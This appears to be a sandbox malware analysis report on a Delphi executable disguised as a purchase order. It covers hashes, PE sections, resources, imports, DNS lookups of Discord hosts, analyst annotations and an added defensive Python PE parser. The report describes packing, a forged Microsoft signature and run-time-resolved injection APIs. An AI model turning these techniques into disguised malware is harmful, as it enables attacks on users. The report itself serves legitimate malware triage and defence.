                                                                                                          SSDEEP:6:a1eZBXVNYTF0NwoScUbtSgyAXIWv7v5PMKq:UeZBFNYTswUq1r5zq
                                                                                                          MD5:F7F759A5CD40BC52172E83486B6DE404
                                                                                                          SHA1:D74930F354A56CFD03DC91AA96D8AE9657B1EE54
                                                                                                          SHA-256:A709C2551B8818D7849D31A65446DC2F8C4CCA2DCBBC5385604286F49CFDAF1C
                                                                                                          SHA-512:A50B7826BFE72506019E4B1148A214C71C6F4743C09E809EF15CD0E0223F3078B683D203200910B07B5E1E34B94F0FE516AC53527311E2943654BFCEADE53298
                                                                                                          Malicious:false
                                                                                                          Preview: ; ==++==..; ..; Copyright (c) Microsoft Corporation. All rights reserved...; ..; ==--==..[.ShellClassInfo]..CLSID={1D2680C9-0E2A-469d-B787-065558BC7D43}..ConfirmFileOp=1..InfoTip=Contains application stability information...

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):7.189657105883589
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.24%
                                                                                                          • InstallShield setup (43055/19) 0.43%
                                                                                                          • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                                                          • Windows Screen Saver (13104/52) 0.13%
                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                          File name:New Order PO20011046.exe
                                                                                                          File size:1311424
                                                                                                          MD5:310a7ca550b9997d0e0bcaf645530303
                                                                                                          SHA1:5617d1e233381ea3fd6ab796fcc6a2de66137c51
                                                                                                          SHA256:0ee90c988386390753a1954692a658e393d761887ecfbfd100105c365a3ebc34
                                                                                                          SHA512:c6d438f7ccaec0dcb5f64cbf50b05af909366ea30c15c15c38cd1abbaf02e7228a26c36781e140841daa79c138bd0c63def9ab769ee40c2525a6a950b1107175
                                                                                                          SSDEEP:24576:FiLDfJXRq+fowpGG7By3Z72mwq8gKmX9hIbEIKn:FiLr5By3Z7NWgKAj
                                                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                          File Icon

                                                                                                          Icon Hash:b2a8949ea686da6a

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x47d118
                                                                                                          Entrypoint Section:CODE
                                                                                                          Digitally signed:true
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                                                          DLL Characteristics:
                                                                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:c7f986b767e22dea5696886cb4d7da70

                                                                                                          Authenticode Signature

                                                                                                          Signature Valid:false
                                                                                                          Signature Issuer:CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                          Error Number:-2146869232
                                                                                                          Not Before:8/18/2016 10:17:17 PM
                                                                                                          Not After:11/2/2017 9:17:17 PM
                                                                                                          Subject Chain
                                                                                                          • CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                          Version:3
                                                                                                          Thumbprint MD5:3B66EDDAB891B79FEDB150AC2C59DB3A
                                                                                                          Thumbprint SHA-1:98ED99A67886D020C564923B7DF25E9AC019DF26
                                                                                                          Thumbprint SHA-256:57DD481BF26C0A55C3E867B2D6C6978BEAF5CE3509325CA2607D853F9349A9FF
                                                                                                          Serial:330000014096A9EE7056FECC07000100000140

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0047CE60h
call 00007F897485DF95h
lea edx, dword ptr [ebx+eax]
push 00000019h
mov eax, dword ptr [004807A4h]
mov eax, dword ptr [eax]
call 00007F89748B30E8h
mov ecx, dword ptr [00480750h]
mov eax, dword ptr [004807A4h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0047C9ECh]
call 00007F89748B30E8h
mov eax, dword ptr [00480750h]
mov eax, dword ptr [eax]
xor edx, edx
call 00007F89748AC65Ah
mov eax, dword ptr [004807A4h]
mov eax, dword ptr [eax]
mov byte ptr [eax+5Bh], 00000000h
mov eax, dword ptr [004807A4h]
mov eax, dword ptr [eax]
call 00007F89748B3143h
call 00007F897485BA86h
nop
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

The prologue, the static table address loaded into eax before the first call, and the repeated double dereferences of [004807A4h] and [00480750h] ahead of each call have the shape of a Delphi-generated program entry (RTL initialisation, then method calls on global Application and form objects), which matches the Delphi compiled forms listed under Resources. The trailing run of add byte ptr [eax], al is the disassembler decoding 00 00 padding after the routine, not executable logic.

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x83000          0x22b0        .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x91000          0xb1400       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x13ae00         0x54c0        .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x88000          0x8138        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x87000          0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Three caveats when reading this table. IMAGE_DIRECTORY_ENTRY_SECURITY holds a file offset to the Authenticode certificate table, not an RVA, so the ".rsrc" shown for it comes from treating that offset as an RVA and carries no meaning. The TLS directory (0x18 bytes in .rdata) is worth checking for callbacks, because TLS callbacks run before the entry point shown above. The empty COM_DESCRIPTOR entry means there is no CLR header: this is a native Delphi executable, not a .NET assembly.

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
CODE    0x1000           0x7c17c       0x7c200   False     0.522454053374   data       6.55138199518   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
DATA    0x7e000          0x2954        0x2a00    False     0.412109375      data       4.92006813937   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
BSS     0x81000          0x114d        0x0       False     0                empty      0.0             IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata  0x83000          0x22b0        0x2400    False     0.355251736111   data       4.85312153514   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls    0x86000          0x10          0x0       False     0                empty      0.0             IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata  0x87000          0x18          0x200     False     0.05078125       data       0.206920017787  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc  0x88000          0x8138        0x8200    False     0.584435096154   data       6.65713214053   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc   0x91000          0xb1400       0xb1400   False     0.549846008903   data       7.13567802778   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

No section is both writable and executable; .idata is writable, which is the usual Delphi layout because the loader writes resolved import addresses into it. The .rsrc section is both the largest (0xb1400 bytes) and the highest-entropy (7.14) section, and two thirds of it is the single 0x76f67-byte RT_RCDATA "GIF" entry listed under Resources, which makes it the natural first place to look for the packed payload behind the unpacking behaviour reported under Signatures.
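
As an added example (not Joe Sandbox code), the following Python rebuilds the two tables above from a PE32 image: it walks the section table, computes each section's Shannon entropy, maps each data directory RVA to the section that contains it, and returns the triage flags a practitioner wants (writable+executable sections, entropy at or above 7). The PE it parses is constructed inline by build_sample_pe so the script runs offline; the dictionary field names, the 7.0 threshold and the sample layout are the author's choices, not the report's.

```python
"""Rebuild a PE32 file's Sections and Data Directories tables and flag what a
triager looks for. Added example, not Joe Sandbox code; the PE it parses is
constructed inline (build_sample_pe) so it runs offline."""
import math
import random
import struct
from collections import Counter

DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]
SCN_CNT_CODE, SCN_CNT_INIT = 0x00000020, 0x00000040
SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000
SECURITY_INDEX = 4  # Authenticode entry: a raw file offset, not an RVA


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 0.0 for an empty section (the 'empty' rows above)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_for_rva(sections, rva):
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s["name"]
    return None


def parse_pe(image: bytes) -> dict:
    pe = struct.unpack_from("<I", image, 0x3C)[0]  # e_lfanew
    if image[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, pe + 4)
    opt = pe + 24
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images handled here")
    ndirs = struct.unpack_from("<I", image, opt + 92)[0]  # NumberOfRvaAndSizes
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", image, opt + opt_size + 40 * i)
        raw = image[rawptr:rawptr + rawsize] if rawsize else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "rawsize": rawsize,
            "type": "data" if raw else "empty", "entropy": shannon_entropy(raw),
            "execute": bool(flags & SCN_EXECUTE), "write": bool(flags & SCN_WRITE),
        })
    dirs = []
    for i in range(min(ndirs, 16)):
        rva, size = struct.unpack_from("<II", image, opt + 96 + 8 * i)
        # SECURITY is a file offset; mapping it through the section table gives a meaningless result.
        where = None if i == SECURITY_INDEX else section_for_rva(sections, rva)
        dirs.append({"name": DIRECTORY_NAMES[i], "rva": rva, "size": size, "section": where})
    return {"sections": sections, "directories": dirs}


def suspicious_sections(parsed) -> list:
    """Triage flags: writable+executable sections, or entropy >= 7 (packed/encrypted)."""
    out = []
    for s in parsed["sections"]:
        if s["write"] and s["execute"]:
            out.append((s["name"], "writable+executable"))
        if s["entropy"] >= 7.0:
            out.append((s["name"], "high entropy"))
    return out


def build_sample_pe() -> bytes:
    """Constructed two-section PE32: low-entropy CODE, high-entropy .rsrc, and an
    Authenticode blob in the overlay. Header fields parse_pe ignores stay zero."""
    rng = random.Random(1)  # fixed seed: reproducible entropy figure
    code = b"\x55\x8b\xec" + b"\x90" * 0x1FD  # push ebp / mov ebp,esp / nop padding
    rsrc = bytes(rng.getrandbits(8) for _ in range(0x1000))  # stands in for packed data
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)
    opt_hdr = struct.pack("<H", 0x10B) + b"\0" * 90 + struct.pack("<I", 16)
    dirs = bytearray(16 * 8)
    struct.pack_into("<II", dirs, 2 * 8, 0x2000, 0x1000)  # RESOURCE -> RVA inside .rsrc
    struct.pack_into("<II", dirs, 4 * 8, 0x1600, 0x100)   # SECURITY -> file offset of overlay
    sec = struct.pack("<8sIIIIIIHHI", b"CODE", 0x200, 0x1000, 0x200, 0x400, 0, 0, 0, 0,
                      SCN_CNT_CODE | SCN_EXECUTE | SCN_READ)
    sec += struct.pack("<8sIIIIIIHHI", b".rsrc", 0x1000, 0x2000, 0x1000, 0x600, 0, 0, 0, 0,
                       SCN_CNT_INIT | SCN_READ)
    headers = dos + b"PE\0\0" + file_hdr + opt_hdr + bytes(dirs) + sec
    return headers.ljust(0x400, b"\0") + code + rsrc + b"\0" * 0x100


if __name__ == "__main__":
    parsed = parse_pe(build_sample_pe())
    print(parsed["sections"], suspicious_sections(parsed))
```

To run it against a real sample, call parse_pe(open(path, "rb").read()); the SECURITY entry is deliberately left unmapped because it is a file offset, which is exactly the mistake visible in the table above.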

Resources

Name             RVA       Size     Type                                                      Language  Country
RT_CURSOR        0x9217c   0x134    data
RT_CURSOR        0x922b0   0x134    data
RT_CURSOR        0x923e4   0x134    data
RT_CURSOR        0x92518   0x134    data
RT_CURSOR        0x9264c   0x134    data
RT_CURSOR        0x92780   0x134    data
RT_CURSOR        0x928b4   0x134    data
RT_BITMAP        0x929e8   0x1d0    data
RT_BITMAP        0x92bb8   0x1e4    data
RT_BITMAP        0x92d9c   0x1d0    data
RT_BITMAP        0x92f6c   0x1d0    data
RT_BITMAP        0x9313c   0x1d0    data
RT_BITMAP        0x9330c   0x1d0    data
RT_BITMAP        0x934dc   0x1d0    data
RT_BITMAP        0x936ac   0x1d0    data
RT_BITMAP        0x9387c   0x1d0    data
RT_BITMAP        0x93a4c   0x1d0    data
RT_BITMAP        0x93c1c   0x5c     data
RT_BITMAP        0x93c78   0x5c     data
RT_BITMAP        0x93cd4   0x5c     data
RT_BITMAP        0x93d30   0x5c     data
RT_BITMAP        0x93d8c   0x5c     data
RT_BITMAP        0x93de8   0x138    data
RT_BITMAP        0x93f20   0x138    data
RT_BITMAP        0x94058   0x138    data
RT_BITMAP        0x94190   0x138    data
RT_BITMAP        0x942c8   0x138    data
RT_BITMAP        0x94400   0x138    data
RT_BITMAP        0x94538   0x104    data
RT_BITMAP        0x9463c   0x138    data
RT_BITMAP        0x94774   0x104    data
RT_BITMAP        0x94878   0x138    data
RT_BITMAP        0x949b0   0xe8     GLS_BINARY_LSB_FIRST                                      English   United States
RT_ICON          0x94a98   0x468    GLS_BINARY_LSB_FIRST                                      English   United States
RT_ICON          0x94f00   0x988    data                                                      English   United States
RT_ICON          0x95888   0x10a8   data                                                      English   United States
RT_ICON          0x96930   0x25a8   data                                                      English   United States
RT_ICON          0x98ed8   0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 240, next used block 251658240    English   United States
RT_ICON          0x9d100   0x5488   data                                                      English   United States
RT_ICON          0xa2588   0x94a8   data                                                      English   United States
RT_ICON          0xaba30   0xa2a8   data                                                      English   United States
RT_DIALOG        0xb5cd8   0x52     data
RT_STRING        0xb5d2c   0x280    data
RT_STRING        0xb5fac   0x274    data
RT_STRING        0xb6220   0x1ec    data
RT_STRING        0xb640c   0x13c    data
RT_STRING        0xb6548   0x2c8    data
RT_STRING        0xb6810   0xfc     Hitachi SH big-endian COFF object file, not stripped, 17664 sections, symbol offset=0x65007200, 83907328 symbols, optional header size 28672
RT_STRING        0xb690c   0xf8     data
RT_STRING        0xb6a04   0x128    data
RT_STRING        0xb6b2c   0x468    data
RT_STRING        0xb6f94   0x37c    data
RT_STRING        0xb7310   0x39c    data
RT_STRING        0xb76ac   0x3e8    data
RT_STRING        0xb7a94   0xf4     data
RT_STRING        0xb7b88   0xc4     data
RT_STRING        0xb7c4c   0x2c0    data
RT_STRING        0xb7f0c   0x478    data
RT_STRING        0xb8384   0x3ac    data
RT_STRING        0xb8730   0x2d4    data
RT_RCDATA        0xb8a04   0x10     data
RT_RCDATA        0xb8a14   0x398    data
RT_RCDATA        0xb8dac   0x494    Delphi compiled form 'TLoginDialog'
RT_RCDATA        0xb9240   0x3c4    Delphi compiled form 'TPasswordDialog'
RT_RCDATA        0xb9604   0x76f67  GIF image data, version 89a, 577 x 188                    English   United States
RT_RCDATA        0x13056c  0x11a42  Delphi compiled form 'T__958758541'
RT_GROUP_CURSOR  0x141fb0  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0x141fc4  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0x141fd8  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0x141fec  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0x142000  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0x142014  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0x142028  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_ICON    0x14203c  0x76     data                                                      English   United States
RT_MANIFEST      0x1420b4  0x2f0    XML 1.0 document, ASCII text, with CRLF line terminators  English   United States

The Type column is a libmagic guess over the raw resource bytes, so the "dBase IV DBT", "Hitachi SH COFF" and "Lotus worksheet" labels are misidentified icon, string-table and cursor-group data, not embedded files. Two entries deserve attention: the 0x76f67-byte (about 487 KB) RT_RCDATA "GIF image" is by far the largest resource and an odd thing for a Delphi form application to carry, and the main form's class name, T__958758541, is a random-looking generated identifier rather than a developer-chosen one.

Imports

DLL           Import
kernel32.dll  DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll    GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll  SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll  TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll  lstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll   VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll     UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetROP2, GetPolyFillMode, GetPixel, GetPaletteEntries, GetObjectA, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll    CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll  Sleep
oleaut32.dll  SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll     CoUninitialize, CoInitialize
oleaut32.dll  GetErrorInfo, SysFreeString
comctl32.dll  ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls

The same DLL appearing several times is typical of Delphi's per-unit import descriptors. The table is the stock VCL runtime: none of the process-injection and evasion primitives reported under Signatures (writing to foreign process memory, creating threads in other processes, WMI queries) is statically imported, so they must be resolved at run time through the imported LoadLibraryA/GetProcAddress pair once unpacking has happened. Static import analysis alone therefore says very little about what this sample does.

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 28, 2020 10:27:38.349987030 CET | 192.168.2.4 | 8.8.8.8 | 0xcfeb | Standard query (0) | discord.com | A (IP address) | IN (0x0001)
Nov 28, 2020 10:27:38.482669115 CET | 192.168.2.4 | 8.8.8.8 | 0xc6f1 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:37.820297956 CET | 192.168.2.4 | 8.8.8.8 | 0x8216 | Standard query (0) | discord.com | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:37.995359898 CET | 192.168.2.4 | 8.8.8.8 | 0x9fd6 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:46.367225885 CET | 192.168.2.4 | 8.8.8.8 | 0x5393 | Standard query (0) | discord.com | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:46.575081110 CET | 192.168.2.4 | 8.8.8.8 | 0x1248 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 28, 2020 10:27:38.377156019 CET | 8.8.8.8 | 192.168.2.4 | 0xcfeb | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:27:38.377156019 CET | 8.8.8.8 | 192.168.2.4 | 0xcfeb | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:27:38.377156019 CET | 8.8.8.8 | 192.168.2.4 | 0xcfeb | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:27:38.377156019 CET | 8.8.8.8 | 192.168.2.4 | 0xcfeb | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:27:38.377156019 CET | 8.8.8.8 | 192.168.2.4 | 0xcfeb | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:27:38.509799004 CET | 8.8.8.8 | 192.168.2.4 | 0xc6f1 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:27:38.509799004 CET | 8.8.8.8 | 192.168.2.4 | 0xc6f1 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:27:38.509799004 CET | 8.8.8.8 | 192.168.2.4 | 0xc6f1 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:27:38.509799004 CET | 8.8.8.8 | 192.168.2.4 | 0xc6f1 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
